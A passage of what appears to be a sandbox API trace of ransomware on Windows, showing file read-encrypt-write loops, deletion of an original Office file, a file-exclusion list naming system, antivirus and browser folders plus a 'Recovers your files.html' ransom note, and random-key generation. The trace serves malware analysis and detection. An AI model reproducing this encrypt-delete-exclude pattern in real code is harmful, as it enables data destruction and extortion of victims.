lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.052] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.052] GetLastError () returned 0x0 [0172.052] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.052] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.053] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.053] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.053] GetLastError () returned 0x0 [0172.053] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.054] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.054] GetLastError () returned 0x0 [0172.054] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.054] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.055] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.055] GetLastError () returned 0x0 [0172.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.055] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.055] GetLastError () returned 0x0 [0172.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.055] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.055] GetLastError () returned 0x0 [0172.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.055] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.055] GetLastError () returned 0x0 [0172.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.055] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.055] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.055] GetLastError () returned 0x0 [0172.055] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.058] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 1 [0172.059] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 1 [0172.060] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0172.060] wcslen (_String="OK") returned 0x2 [0172.060] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.060] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.060] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0172.060] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0172.060] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*NMCRYPT") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*Recovers your files.html") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.exe") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.dll") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.lnk") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.bat") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.ini") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.msi") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*.scf") returned 0 [0172.060] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*pagefile.sys*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*NTUSER.DAT*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*AppData*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\winrar\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\Internet Explorer\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\java\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\TeamViewer\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\windows\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\ESET\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\AVG\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\AVIRA\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*\\AVAST Software\\*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*Atheros*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*Realtek*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*bootmgr*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*boot*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*boot*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*CONFIG.SYS*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*IO.SYS*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*MSDOS.SYS*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*NTDETECT.COM*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*ntldr*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*chrome*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*opera*") returned 0 [0172.061] PathMatchSpecW (pszFile="OSPP.VBS", pszSpec="*firefox*") returned 0 [0172.061] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS", pszSpec="*") returned 1 [0172.061] strlen (_Str="NMoreira") returned 0x8 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 